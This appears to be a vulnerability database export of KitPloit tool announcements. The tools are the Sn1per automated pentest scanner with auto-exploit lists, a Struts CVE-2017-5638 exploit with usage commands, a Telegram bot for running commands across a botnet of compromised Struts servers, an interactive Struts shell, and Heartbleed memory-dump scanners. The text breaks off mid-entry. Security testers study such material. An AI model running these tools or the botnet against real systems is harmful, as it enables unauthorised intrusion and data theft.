["USERMIN_1220_INFO_DISCLOSURE.NASL", "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL", "GENTOO_GLSA-200608-11.NASL", "WEBMIN_1290.NASL", "STRUTS_2_5_10_1_RCE.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2006-3392.NSE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM", "MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106652", "OPENVAS:57067", "OPENVAS:1361412562310811730", "OPENVAS:57861"]}, {"type": "cert", "idList": ["VU:112992", "VU:999601"]}, {"type": "gentoo", "idList": ["GLSA-200608-11"]}, {"type": "osvdb", "idList": ["OSVDB:26772"]}, {"type": "saint", "idList": ["SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "SAINT:88789BF22A82B3B79355F9F1C375C644", "SAINT:49062325B1FAB54D731E4C8FBF78D940"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141630", "PACKETSTORM:86448", "PACKETSTORM:144034", "PACKETSTORM:144050"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}, {"type": "ics", "idList": ["ICSA-15-344-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"]}, {"type": "zdt", "idList": ["1337DAY-ID-28454", "1337DAY-ID-27300", "1337DAY-ID-28445"]}, {"type": "github", "idList": ["GHSA-GG9M-FJ3V-R58C"]}, {"type": "dsquare", "idList": ["E-643"]}], "modified": "2020-04-07T04:42:36", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-04-07T04:42:36", "rev": 2}, "vulnersScore": 7.3}, "objectVersion": "1.3", "toolHref": "https://github.com/1N3/Sn1per", "scheme": null}

{"kitploit": [{"lastseen": "2020-04-07T04:43:26", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n** Categorized host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Personalized notes field for each host ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n** DEMO VIDEO: ** \n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** AUTO-PWN: ** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600 \n * GPON Router RCE CVE-2018-10561 \n * [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638 \n * Apache Struts 2 RCE CVE-2017-9805 \n * Apache Jakarta RCE CVE-2017-5638 \n * Shellshock GNU Bash RCE CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * Default Apache Tomcat Creds CVE-2009-3843 \n * MS Windows SMB RCE MS08-067 \n * Webmin File Disclosure CVE-2006-3392 \n * [ Anonymous FTP ](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access \n * PHPMyAdmin Backdoor RCE \n * PHPMyAdmin Auth Bypass \n * JBoss Java De-Serialization RCE's \n \n** KALI LINUX INSTALL: ** \n\n \n \n ./install.sh\n\n \n** DOCKER INSTALL: ** \nCredits: @menzow \nDocker Install: [ https://github.com/menzow/sn1per-docker ](<https://github.com/menzow/sn1per-docker>) \nDocker Build: [ https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ](<https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/>) \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** UPDATE: ** Checks for updates and upgrades all components used by sniper. \n * ** REIMPORT: ** Reimport all workspace files into Metasploit and reproduce all reports. \n * ** RELOAD: ** Reload the master workspace report. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc>) \n \n \n\n\n** [ Download Sn1per v5.0 ](<https://github.com/1N3/Sn1per>) **\n", "modified": "2018-07-05T13:45:01", "published": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T04:43:33", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP &amp; HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T04:43:05", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638 ** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed ](<https://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "modified": "2017-03-14T13:34:05", "published": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-25T04:38:44", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T04:41:48", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "modified": "2017-03-14T17:30:13", "published": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": "http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T04:41:56", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n** Usage: ** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "modified": "2017-03-17T14:22:01", "published": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T04:43:38", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: 